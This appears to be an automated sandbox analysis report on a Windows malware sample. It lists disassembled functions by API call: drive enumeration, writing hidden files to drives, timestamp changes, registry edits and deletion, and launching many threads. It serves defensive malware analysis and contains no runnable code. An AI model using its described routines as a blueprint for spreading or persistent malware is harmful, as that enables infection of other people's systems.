                                • API String ID: 3947658864-0
                                • Opcode ID: 00a5c07dd6d4fde2ef3386e0807b931ffbc980fcc65a04ad5244a833a6f69504
                                • Instruction ID: 8cdbe9e0702511c2125f0ccd2a45f382b5d21e4bf40e2861f82e099cc7af29bf
                                • Opcode Fuzzy Hash: 00a5c07dd6d4fde2ef3386e0807b931ffbc980fcc65a04ad5244a833a6f69504
                                • Instruction Fuzzy Hash: FA51F974D402A8EBEB34DF54CD49BE9B7B4AB08741F0085D9E289BA280D7F85AC48F15
                                Function 02B657A0 Relevance: 4.6, APIs: 3, Instructions: 141filesleepCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileA.KERNEL32(00000000,00000000), ref: 02B658AE
                                • FindNextFileA.KERNELBASE(000000FF,00000000), ref: 02B658D5
                                • Sleep.KERNEL32(00000100), ref: 02B6599E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: FileFind$FirstNextSleep
                                • String ID:
                                • API String ID: 2635277345-0
                                • Opcode ID: 4c12d6f3662347bfe566c9af4d1a360802217f2b29b3515e17cb44e946e8b8ad
                                • Instruction ID: 50c63e8c8806ad82831309dd7ae6f1175beb22c927b6e805e90c3930a12c7dfb
                                • Opcode Fuzzy Hash: 4c12d6f3662347bfe566c9af4d1a360802217f2b29b3515e17cb44e946e8b8ad
                                • Instruction Fuzzy Hash: C6515D71900218DBDF75DBA4DC48BEE7779AB44309F4049E8E20EAA180DB74ABD4CF51
                                Function 02B6D2B0 Relevance: 3.2, APIs: 2, Instructions: 153synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02B6D4B3
                                • FindCloseChangeNotification.KERNEL32(?), ref: 02B6D4DF
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: ChangeCloseCreateFindMutexNotification
                                • String ID:
                                • API String ID: 2967213129-0
                                • Opcode ID: e1a4e3bea40d29e8138a8d915f500402d994940cba178ad39b6cf8fccecbf403
                                • Instruction ID: 7481c9e639e95ce03310e721a5441432a0629991dee16742b74f74841e32935a
                                • Opcode Fuzzy Hash: e1a4e3bea40d29e8138a8d915f500402d994940cba178ad39b6cf8fccecbf403
                                • Instruction Fuzzy Hash: 2C512CB5D40218DBDF24EBA0DC8CBE97779AB58301F008DD9E649AA140DBB89AD4CF51
                                Function 02B6DD99 Relevance: 39.0, APIs: 20, Strings: 2, Instructions: 450filesleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 2b6dd99-2b6deeb call 2b73600 call 2b613e8 Sleep call 2b65be5 CreateFileA 7 2b6deed-2b6df14 WriteFile FindCloseChangeNotification 0->7 8 2b6df1a-2b6df34 call 2b69652 0->8 7->8 11 2b6df36-2b6df41 8->11 12 2b6df43-2b6df4d 8->12 11->8 13 2b6e4d3-2b6e504 12->13 14 2b6df53-2b6df5d 12->14 14->13 17 2b6df63-2b6df6f 14->17 17->13 18 2b6df75-2b6df82 17->18 18->13 19 2b6df88-2b6df8f 18->19 19->13 21 2b6df95-2b6dfdd call 2b6dc56 Sleep GetLogicalDrives 19->21 25 2b6e4c3-2b6e4ce Sleep 21->25 26 2b6dfe3-2b6e001 21->26 25->19 27 2b6e007-2b6e045 GetDriveTypeA 26->27 28 2b6e4be 26->28 27->28 29 2b6e04b-2b6e087 CreateFileA 27->29 28->25 31 2b6e2b0-2b6e2ca GetFileAttributesA 29->31 32 2b6e08d-2b6e0c5 29->32 33 2b6e2f7-2b6e320 CreateFileA 31->33 34 2b6e2cc-2b6e2f4 call 2b65758 31->34 40 2b6e2a3-2b6e2a9 32->40 41 2b6e0cb-2b6e0e7 32->41 33->28 35 2b6e326-2b6e3ac call 2b65618 call 2b613e8 33->35 34->33 54 2b6e3c2-2b6e3cd 35->54 55 2b6e3ae-2b6e3c0 35->55 40->31 41->40 44 2b6e0ed-2b6e142 call 2b61000 ReadFile 41->44 58 2b6e29e 44->58 59 2b6e148-2b6e165 call 2b642c7 44->59 57 2b6e3d4-2b6e47c call 2b6d928 WriteFile SetFileTime FindCloseChangeNotification SetFileAttributesA CreateFileA 54->57 55->57 57->28 68 2b6e47e-2b6e4b8 WriteFile SetFileAttributesA 57->68 58->40 59->58 65 2b6e16b-2b6e17e 59->65 65->58 69 2b6e184-2b6e18d 65->69 68->28 70 2b6e193-2b6e1a5 69->70 71 2b6e299 69->71 73 2b6e1a7-2b6e1ad 70->73 74 2b6e1b0-2b6e1b3 70->74 71->58 73->74 75 2b6e1b9-2b6e1c5 74->75 76 2b6e1c7-2b6e1d3 75->76 77 2b6e1f3-2b6e21d GetFileAttributesA 75->77 76->77 78 2b6e1d5-2b6e1e0 76->78 81 2b6e297 77->81 82 2b6e21f-2b6e255 77->82 78->77 79 2b6e1e2-2b6e1f1 78->79 79->75 81->58 82->81 85 2b6e257-2b6e290 82->85 85->81
                                APIs
                                • Sleep.KERNEL32 ref: 02B6DEAD
                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 02B6DED8
                                • WriteFile.KERNEL32(000000FF,02BE2300,000002E5,?,00000000), ref: 02B6DF07
                                • FindCloseChangeNotification.KERNEL32(000000FF), ref: 02B6DF14
                                • Sleep.KERNEL32(00004E20), ref: 02B6DF9F
                                • GetLogicalDrives.KERNEL32 ref: 02B6DFAF
                                • GetDriveTypeA.KERNEL32(?), ref: 02B6E032
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 02B6E074
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: File$CreateSleep$ChangeCloseDriveDrivesFindLogicalNotificationTypeWrite
                                • String ID: :$\
                                • API String ID: 2525275916-1166558509
                                • Opcode ID: 8c1dc03068369ea17b6e915bd5c2829e17045b3796667683728e96d745e321f8
                                • Instruction ID: c5eee00d90334488c939ff6a29bcc3bd8a4eddeb3f2308ab3f538172d7227589
                                • Opcode Fuzzy Hash: 8c1dc03068369ea17b6e915bd5c2829e17045b3796667683728e96d745e321f8
                                • Instruction Fuzzy Hash: 71127C75D44258DBDB24DBA4CC88FEAB775AB48300F0449D8E249EB180D7B89AA4CF51
                                Function 02B6E6F0 Relevance: 31.9, APIs: 16, Strings: 2, Instructions: 383registrylibrarymemoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 590 2b6e6f0-2b6e779 call 2b73600 call 2b6dc56 LoadLibraryA 595 2b6e7c5-2b6e7df 590->595 596 2b6e77b-2b6e7c0 590->596 599 2b6e844-2b6e866 RegOpenKeyExA 595->599 600 2b6e7e1-2b6e83f 595->600 596->595 601 2b6e8a0-2b6e8c2 RegOpenKeyExA 599->601 602 2b6e868-2b6e89a RegSetValueExA RegCloseKey 599->602 600->599 605 2b6e8c4-2b6e8f5 RegSetValueExA 601->605 606 2b6e8fc-2b6e945 RegOpenKeyExA 601->606 602->601 605->606 612 2b6e947-2b6e9ab 606->612 613 2b6e9b2-2b6e9d4 RegOpenKeyExA 606->613 612->613 615 2b6e9da-2b6ea62 RegSetValueExA * 3 RegCloseKey 613->615 616 2b6ea68-2b6ea96 GetComputerNameA 613->616 615->616 619 2b6eae6-2b6eb23 CreateFileMappingA call 2b61444 call 2b61b0e 616->619 620 2b6ea98-2b6eadf 616->620 630 2b6eb25 call 2b659de 619->630 631 2b6eb2a-2b6eb6b 619->631 620->619 630->631 632 2b6eb6d-2b6eb77 631->632 633 2b6eb79-2b6eba5 call 2b613e8 631->633 632->633 635 2b6eba8-2b6ebb8 632->635 633->635 638 2b6ec82-2b6ecbb 635->638 639 2b6ebbe-2b6ebce 635->639 651 2b6eccd-2b6ed34 CharLowerA GlobalAlloc 638->651 652 2b6ecbd-2b6ecc2 638->652 639->638 640 2b6ebd4-2b6ebe3 639->640 640->638 643 2b6ebe9-2b6ec1f 640->643 644 2b6ec21-2b6ec2d 643->644 645 2b6ec2f 643->645 648 2b6ec39-2b6ec79 644->648 645->648 655 2b6ec7d 648->655 656 2b6ec7b 648->656 652->651 655->635 656->638
                                APIs
                                  • Part of subcall function 02B6DC56: RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?,?), ref: 02B6DC9D
                                  • Part of subcall function 02B6DC56: RegSetValueExA.KERNELBASE(?,?,00000000,00000004,00000002,00000004), ref: 02B6DCCB
                                  • Part of subcall function 02B6DC56: RegCloseKey.KERNEL32(?), ref: 02B6DCD8
                                • LoadLibraryA.KERNEL32(?), ref: 02B6E766
                                • RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,00000000), ref: 02B6E85E
                                • RegSetValueExA.KERNEL32(00000000,?,00000000,00000004,00000000,00000004), ref: 02B6E88D
                                • RegCloseKey.KERNEL32(00000000), ref: 02B6E89A
                                • RegOpenKeyExA.KERNEL32(80000002,?,00000000,000F003F,00000000), ref: 02B6E8BA
                                • RegSetValueExA.KERNEL32(00000000,?,00000000,00000004,00000000,00000004), ref: 02B6E8E9
                                • RegOpenKeyExA.KERNEL32(80000002,00000000,00000000,000F003F,00000000), ref: 02B6E93D
                                • RegOpenKeyExA.KERNEL32(80000002,?,00000000,000F003F,00000000), ref: 02B6E9CC
                                • RegSetValueExA.KERNELBASE(00000000,?,00000000,00000004,00000000,00000004), ref: 02B6E9FF
                                • RegSetValueExA.KERNELBASE(00000000,?,00000000,00000004,00000000,00000004), ref: 02B6EA2A
                                • RegSetValueExA.KERNEL32(00000000,?,00000000,00000004,00000001,00000004), ref: 02B6EA55
                                • RegCloseKey.KERNEL32(00000000), ref: 02B6EA62
                                • GetComputerNameA.KERNEL32(00000000,00000080), ref: 02B6EA80
                                • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00015400,?), ref: 02B6EAF9
                                • CharLowerA.USER32(c:\windows), ref: 02B6ED06
                                • GlobalAlloc.KERNEL32(00000040,00021000), ref: 02B6ED13
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: Value$Open$Close$AllocCharComputerCreateFileGlobalLibraryLoadLowerMappingName
                                • String ID: c:\windows$n
                                • API String ID: 2451392965-3198247416
                                • Opcode ID: 47b5c9bf75e07167d73b15eeec557572be9e0c1dfbfbb9db9a39256cef901a7b
                                • Instruction ID: 1fe3d31b519234987f84e6c34e1e0e22398861981ec84882dc0cb45ab41df8f2
                                • Opcode Fuzzy Hash: 47b5c9bf75e07167d73b15eeec557572be9e0c1dfbfbb9db9a39256cef901a7b
                                • Instruction Fuzzy Hash: 6DF17EB5D80214DFEB20DBA4DC9CFAA7779BB48342F0449D8F209AB281D7B45A94CF54
                                Function 02B6E507 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 123sleepthreadlibraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • Sleep.KERNEL32(00000400), ref: 02B6E550
                                • LoadLibraryA.KERNEL32(00000000), ref: 02B6E57C
                                • GetProcAddress.KERNEL32(00000000,?), ref: 02B6E59E
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000DD99,00000000,00000000,00000000,00000000,00000000), ref: 02B6E61E
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000CC39,00000000,00000000,?,00000000,00000000), ref: 02B6E645
                                • Sleep.KERNEL32(00000400), ref: 02B6E659
                                • Sleep.KERNEL32(00000400), ref: 02B6E67F
                                • CreateThread.KERNEL32(00000000,00000000,02B6CA87,0000005A,00000000,?,00000000,00000000), ref: 02B6E6AB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: CreateSleepThread$AddressLibraryLoadProc
                                • String ID: Z
                                • API String ID: 3386919701-1505515367
                                • Opcode ID: 027bb4e192a755716d405bee4929be617e877f606e936b90ddfba984a7197899
                                • Instruction ID: fe5df30674f3dacd876b8af209bc72bcb0d50fe659818b22139ad700852fb62f
                                • Opcode Fuzzy Hash: 027bb4e192a755716d405bee4929be617e877f606e936b90ddfba984a7197899
                                • Instruction Fuzzy Hash: 8C418E79D80354EBEB11AB90EC0DFE53738AB08742F004895F24AAB180D7F459D4CF55
                                Function 02B6ED35 Relevance: 15.2, APIs: 10, Instructions: 197threadsleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • SetErrorMode.KERNEL32(00008002), ref: 02B6ED52
                                  • Part of subcall function 02B6E6F0: LoadLibraryA.KERNEL32(?), ref: 02B6E766
                                  • Part of subcall function 02B6E6F0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,00000000), ref: 02B6E85E
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000D570,00000000,00000000,00000000,00000000,00000000), ref: 02B6EDA5
                                • CreateThread.KERNEL32(00000000,00000000,Function_000053B2,00000000,00000000,?,00000000,00000000), ref: 02B6EDCC
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000E507,00000000,00000000,?,00000000,00000000), ref: 02B6EDF3
                                • CreateThread.KERNEL32(00000000,00000000,Function_00003FAA,00000000,00000000,?,00000000,00000000), ref: 02B6EE1A
                                • CreateThread.KERNEL32(00000000,00000000,Function_000057A0,00000000,00000000,?,00000000,00000000), ref: 02B6EE41
                                  • Part of subcall function 02B6F030: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00008000,?,?,?,02B63DE7), ref: 02B6F067
                                  • Part of subcall function 02B6F030: MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00008000,?,02B63DE7), ref: 02B6F08E
                                • CreateThread.KERNEL32(00000000,00000000,Function_00001189,00000000,00000000,?,00000000,00000000,00000001), ref: 02B6EF9E
                                • CreateThread.KERNEL32(00000000,00000000,Function_00003911,00000000,00000000,?,00000000,00000000), ref: 02B6EFC5
                                • CreateThread.KERNEL32(00000000,00000000,Function_00003D9B,00000000,00000000,?,00000000,00000000), ref: 02B6EFEC
                                • Sleep.KERNEL32(00000200), ref: 02B6F009
                                  • Part of subcall function 02B67C71: MapViewOfFile.KERNEL32(?,00000006,00000000,00000000,00015400), ref: 02B67CA8
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: Create$Thread$File$View$ErrorLibraryLoadMappingModeOpenSleep
                                • String ID:
                                • API String ID: 4067783054-0
                                • Opcode ID: 5500f2b1e149979270730a1ee2aed56eb19fa2e2be9d01c632da26fb855ffde4
                                • Instruction ID: 492ea4d9140c265d2cd31a296f2b54d5ce69d48a8e051451d97541e8301306da
                                • Opcode Fuzzy Hash: 5500f2b1e149979270730a1ee2aed56eb19fa2e2be9d01c632da26fb855ffde4
                                • Instruction Fuzzy Hash: 05713C75B91314BBFB60AB90DC5AFF97375AB05B01F1044E4B20A7A1C0DBF86A848F56
                                Function 02B6BE89 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 227fileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 832 2b6be89-2b6bf24 CreateFileA 833 2b6bf26-2b6bf28 832->833 834 2b6bf2d-2b6bf64 ReadFile 832->834 835 2b6c1ea-2b6c1ee 833->835 837 2b6bf66-2b6bfa0 call 2b61209 call 2b612e2 834->837 838 2b6bfa2-2b6bfa6 834->838 839 2b6c015-2b6c07e SetFilePointer WriteFile SetFilePointer SetEndOfFile 837->839 838->839 840 2b6bfa8-2b6bfb2 838->840 847 2b6c080-2b6c08a 839->847 848 2b6c08c-2b6c090 839->848 842 2b6bfc6-2b6bfcf 840->842 842->839 845 2b6bfd1-2b6c013 call 2b61209 call 2b612e2 842->845 845->842 847->848 850 2b6c0b0-2b6c0b4 847->850 851 2b6c092-2b6c095 848->851 852 2b6c09c-2b6c0ab DeleteFileA 848->852 855 2b6c0b6-2b6c0b9 850->855 856 2b6c0c0-2b6c135 850->856 851->852 852->835 855->856 864 2b6c146-2b6c14d 856->864 865 2b6c174-2b6c1e4 call 2b610e5 864->865 866 2b6c14f-2b6c160 864->866 865->835 867 2b6c172 866->867 868 2b6c162-2b6c170 866->868 867->864 868->865
                                APIs
                                • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000000,00000000,?), ref: 02B6BF11
                                • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 02B6BF5A
                                • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000), ref: 02B6C022
                                • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 02B6C040
                                • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000), ref: 02B6C055
                                • SetEndOfFile.KERNEL32(000000FF), ref: 02B6C062
                                • DeleteFileA.KERNEL32(00000000), ref: 02B6C0A0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: File$Pointer$CreateDeleteReadWrite
                                • String ID: D
                                • API String ID: 529351820-2746444292
                                • Opcode ID: e02fcc8e9df502e86db3a4160bff2433ea3350cfb23b5df8ebbc49c485aab7e4
                                • Instruction ID: eb8f7d9fd88b4336a8091be7d0c08a06528fe0abf8909f4f97de706fb79dd561
                                • Opcode Fuzzy Hash: e02fcc8e9df502e86db3a4160bff2433ea3350cfb23b5df8ebbc49c485aab7e4
                                • Instruction Fuzzy Hash: E1A14EB5940218EFDB20DF94DC4CBEAB7B5EB48305F1089C9F609AB280D7B95A84CF55
                                Function 02B6F760 Relevance: 9.3, APIs: 6, Instructions: 303registryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 966 2b6f760-2b6f7ef 967 2b6f7f1-2b6f7fb 966->967 968 2b6f7fd 966->968 967->968 969 2b6f802-2b6f850 GetUserNameA call 2b72ceb 967->969 970 2b6fcdb-2b6fce0 968->970 975 2b6f866-2b6f870 969->975 976 2b6f852-2b6f85f 969->976 977 2b6f881-2b6f894 975->977 976->975 979 2b6f896-2b6f8da 977->979 980 2b6f8dc-2b6f8fe RegOpenKeyExA 977->980 979->977 981 2b6f900-2b6f904 980->981 982 2b6f92d-2b6f931 980->982 984 2b6f906 981->984 985 2b6f90b-2b6f926 981->985 986 2b6f937-2b6f941 982->986 987 2b6fb29-2b6fb60 982->987 984->970 985->982 1001 2b6f928 985->1001 990 2b6f94b-2b6f977 RegEnumValueA 986->990 991 2b6fb66-2b6fb70 987->991 992 2b6fcc5-2b6fccc 987->992 994 2b6f9ad-2b6f9db 990->994 995 2b6f979-2b6f982 990->995 991->992 1000 2b6fb76-2b6fba1 991->1000 992->970 998 2b6fcce-2b6fcd5 RegCloseKey 992->998 1003 2b6fb24 994->1003 1004 2b6f9e1-2b6f9f3 994->1004 996 2b6f986-2b6f9ab 995->996 997 2b6f984 995->997 996->990 997->994 998->970 1006 2b6fba7-2b6fc0e RegQueryValueExA 1000->1006 1007 2b6fcb3-2b6fcb9 1000->1007 1001->970 1003->992 1008 2b6f9f5-2b6fa03 1004->1008 1009 2b6fa11 1004->1009 1015 2b6fc10-2b6fc1a 1006->1015 1016 2b6fc1f-2b6fc5c 1006->1016 1013 2b6fcc0 1007->1013 1008->1009 1010 2b6fa05-2b6fa0f 1008->1010 1009->1003 1010->1009 1011 2b6fa16-2b6fa20 1010->1011 1014 2b6fa31-2b6fa38 1011->1014 1013->1013 1019 2b6fa3e-2b6fa8b 1014->1019 1020 2b6fb1f 1014->1020 1015->1007 1017 2b6fcae 1016->1017 1018 2b6fc5e-2b6fc64 1016->1018 1017->1007 1021 2b6fc8e-2b6fc9d 1018->1021 1022 2b6fc9f-2b6fcab 1018->1022 1023 2b6fc6b-2b6fc79 1018->1023 1024 2b6fc7b-2b6fc8c 1018->1024 1026 2b6fade-2b6fb1a RegSetValueExA 1019->1026 1027 2b6fa8d-2b6fa93 1019->1027 1020->1003 1021->1017 1022->1017 1023->1017 1024->1017 1032 2b6fa22-2b6fa2b 1026->1032 1027->1021 1027->1022 1027->1023 1027->1024 1028 2b6fabe-2b6facd 1027->1028 1029 2b6facf-2b6fad8 1027->1029 1030 2b6fa9a-2b6faa8 1027->1030 1031 2b6faaa-2b6fabc 1027->1031 1028->1026 1029->1026 1030->1026 1031->1026 1032->1014
                                APIs
                                • GetUserNameA.ADVAPI32(00000000,00000104), ref: 02B6F822
                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 02B6F8F6
                                • RegEnumValueA.KERNEL32(00000000,00000000,00000000,00000104,00000000,00000000,00000000,00000000), ref: 02B6F96F
                                • RegCloseKey.KERNEL32(00000000), ref: 02B6FCD5
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: CloseEnumNameOpenUserValue
                                • String ID:
                                • API String ID: 3905208545-0
                                • Opcode ID: 4c83ff623018d4b09f9099d0e0f6907be4f5803f461121e74c37b96abeae87ec
                                • Instruction ID: d2983f8cac2445d8dc31d072c2d7808a1e19098c1c6c03cd7b132fde1c83e6a4
                                • Opcode Fuzzy Hash: 4c83ff623018d4b09f9099d0e0f6907be4f5803f461121e74c37b96abeae87ec
                                • Instruction Fuzzy Hash: B9E11571941228EBDB24DB54EC8CBF9B7B5EB58304F1086D9E50AAB250D7789AC4CF90
                                Function 02B6DFC7 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 133filesleeptimeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1033 2b6dfc7-2b6dfd0 1034 2b6dfd6-2b6dfdd 1033->1034 1035 2b6e4c3-2b6e4ce Sleep 1034->1035 1036 2b6dfe3-2b6e001 1034->1036 1040 2b6df95-2b6dfc5 call 2b6dc56 Sleep GetLogicalDrives 1035->1040 1041 2b6e4d3-2b6e504 1035->1041 1037 2b6e007-2b6e045 GetDriveTypeA 1036->1037 1038 2b6e4be 1036->1038 1037->1038 1042 2b6e04b-2b6e087 CreateFileA 1037->1042 1038->1035 1040->1034 1047 2b6e2b0-2b6e2ca GetFileAttributesA 1042->1047 1048 2b6e08d-2b6e0c5 1042->1048 1050 2b6e2f7-2b6e320 CreateFileA 1047->1050 1051 2b6e2cc-2b6e2f4 call 2b65758 1047->1051 1057 2b6e2a3-2b6e2a9 1048->1057 1058 2b6e0cb-2b6e0e7 1048->1058 1050->1038 1052 2b6e326-2b6e3ac call 2b65618 call 2b613e8 1050->1052 1051->1050 1071 2b6e3c2-2b6e3cd 1052->1071 1072 2b6e3ae-2b6e3c0 1052->1072 1057->1047 1058->1057 1061 2b6e0ed-2b6e142 call 2b61000 ReadFile 1058->1061 1075 2b6e29e 1061->1075 1076 2b6e148-2b6e165 call 2b642c7 1061->1076 1074 2b6e3d4-2b6e47c call 2b6d928 WriteFile SetFileTime FindCloseChangeNotification SetFileAttributesA CreateFileA 1071->1074 1072->1074 1074->1038 1085 2b6e47e-2b6e4b8 WriteFile SetFileAttributesA 1074->1085 1075->1057 1076->1075 1082 2b6e16b-2b6e17e 1076->1082 1082->1075 1086 2b6e184-2b6e18d 1082->1086 1085->1038 1087 2b6e193-2b6e1a5 1086->1087 1088 2b6e299 1086->1088 1090 2b6e1a7-2b6e1ad 1087->1090 1091 2b6e1b0-2b6e1b3 1087->1091 1088->1075 1090->1091 1092 2b6e1b9-2b6e1c5 1091->1092 1093 2b6e1c7-2b6e1d3 1092->1093 1094 2b6e1f3-2b6e21d GetFileAttributesA 1092->1094 1093->1094 1095 2b6e1d5-2b6e1e0 1093->1095 1098 2b6e297 1094->1098 1099 2b6e21f-2b6e255 1094->1099 1095->1094 1096 2b6e1e2-2b6e1f1 1095->1096 1096->1092 1098->1075 1099->1098 1102 2b6e257-2b6e290 1099->1102 1102->1098
                                APIs
                                • Sleep.KERNEL32(00004E20), ref: 02B6DF9F
                                • GetLogicalDrives.KERNEL32 ref: 02B6DFAF
                                • GetDriveTypeA.KERNEL32(?), ref: 02B6E032
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 02B6E074
                                • ReadFile.KERNEL32(?,?,00000FA0,?,00000000), ref: 02B6E11F
                                • GetFileAttributesA.KERNEL32(?), ref: 02B6E214
                                • GetFileAttributesA.KERNEL32(?), ref: 02B6E2B7
                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 02B6E30D
                                • WriteFile.KERNEL32(?,?,00000000), ref: 02B6E40F
                                • SetFileTime.KERNEL32(?,?,?,?), ref: 02B6E431
                                • FindCloseChangeNotification.KERNEL32(?), ref: 02B6E43E
                                • SetFileAttributesA.KERNEL32(?,00000007), ref: 02B6E44D
                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 02B6E469
                                • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 02B6E49C
                                • SetFileAttributesA.KERNEL32(?,00000007), ref: 02B6E4B8
                                • Sleep.KERNEL32(00001B58), ref: 02B6E4C8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: File$Attributes$Create$SleepWrite$ChangeCloseDriveDrivesFindLogicalNotificationReadTimeType
                                • String ID: :$\
                                • API String ID: 2942510372-1166558509
                                • Opcode ID: 6d408ae051202b68c5254529c7756bf682b1e228cbdb1f3b2f5f417db3968e01
                                • Instruction ID: 6588ceb5d4147a8aed3597e9a9e46a9d0c766f87418cef896b5b1f058fefa3e8
                                • Opcode Fuzzy Hash: 6d408ae051202b68c5254529c7756bf682b1e228cbdb1f3b2f5f417db3968e01
                                • Instruction Fuzzy Hash: 43517875D00268DBDB24DB64CC88BFEB7B6FB85345F0485C9E109EA280D7789AA5CF50
                                Function 02B643EC Relevance: 7.6, APIs: 5, Instructions: 94registryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1271 2b643ec-2b64410 RegOpenKeyExA 1272 2b64416-2b6441d 1271->1272 1273 2b6451d-2b64520 1271->1273 1274 2b64424-2b64447 RegEnumValueA 1272->1274 1275 2b64477-2b6447e 1274->1275 1276 2b64449-2b64459 1274->1276 1279 2b64485-2b644ab RegEnumKeyExA 1275->1279 1277 2b6445d-2b64475 RegDeleteValueA 1276->1277 1278 2b6445b 1276->1278 1277->1274 1278->1275 1280 2b64513-2b64516 1279->1280 1281 2b644ad-2b644b6 1279->1281 1280->1273 1282 2b644ba-2b6450e call 2b643ec RegDeleteKeyA 1281->1282 1283 2b644b8 1281->1283 1282->1279 1283->1280
                                APIs
                                • RegOpenKeyExA.KERNEL32(02B653F7,?,00000000,000F003F,02B653F7), ref: 02B64408
                                • RegEnumValueA.KERNEL32(02B653F7,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 02B6443F
                                • RegDeleteValueA.KERNEL32(02B653F7,?), ref: 02B64468
                                • RegEnumKeyExA.KERNEL32(02B653F7,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 02B644A0
                                • RegDeleteKeyA.ADVAPI32(02B653F7,?), ref: 02B644FA
